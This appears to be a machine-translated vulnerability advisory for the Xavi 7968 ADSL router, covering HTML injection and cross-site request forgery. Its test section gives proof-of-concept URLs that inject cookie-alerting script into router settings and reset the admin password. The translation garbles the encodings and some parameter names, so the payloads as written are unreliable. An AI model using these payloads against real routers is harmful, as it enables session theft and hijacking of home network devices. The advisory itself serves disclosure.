Release date:
Updated on:
Affected Systems:
Xavi 7968 ADSL Router
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52098
Xavi ADSL Router is an ADSL Router.
Xavi 7968 ADSL Router has the HTML injection and Cross-Site Request Forgery Vulnerability. Attackers can exploit this vulnerability to execute arbitrary script code, steal Cookie authentication creden。, or perform certain management operations.
<* Source: businde
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/webconfig/wan/confirm.html/confirm? Context = pageAction % 3 Dadd % 26 pvcName % 3D % 2522% 253e % 253c % 252ftd % 253e % 253 cscript % 253 ealert % 28document. cookie % 29% 253c % 252 fscript % 253e % 26vpi % 3D0% 26vci % 3D38% 26 scat % 3 DUBR % 26 accessmode % 3 Dpppoe % 26 encap % 3 Dvcmux % 26 encapmode % 3 dbridged % 26 iptype % 3 Ddhcp % 26nat_enable % 3 Dfalse % failed % 3 Dfalse % 26qos_enable % 3 Dfalse % 26 failed % 3 Dfalse % 26 tBoxPPPOEAC % 3 DNot % 2520 Configured % 26 sessiontype % 3Dalways_on % 26 username % 3Da % 26 password % 3Dss & amp; confirm = + Apply +
Http://www.example.com/webconfig/lan/lan_config.html/local_lan_config? Ip_add_txtbox = www.example2.com & amp; sub_mask_txtbox = 255.255.255.0 & amp; host_name_txtbox = Hack & lt; SCRIPT & gt; alert (document. cookie) & lt;/script & gt; & amp; domain_name_txtbox = local. lan & amp; mtu_txtbox = 1500 & amp; next = Apply
Http://www.example.com/webconfig/admin_passwd/passwd.html/admin_passwd? SySUSErName = 1234 & amp; sysPassword = 12345 & amp; sysCfmPwd = 12345 & amp; cmdSubmit = Apply
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Xavi
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.xavi.com.tw/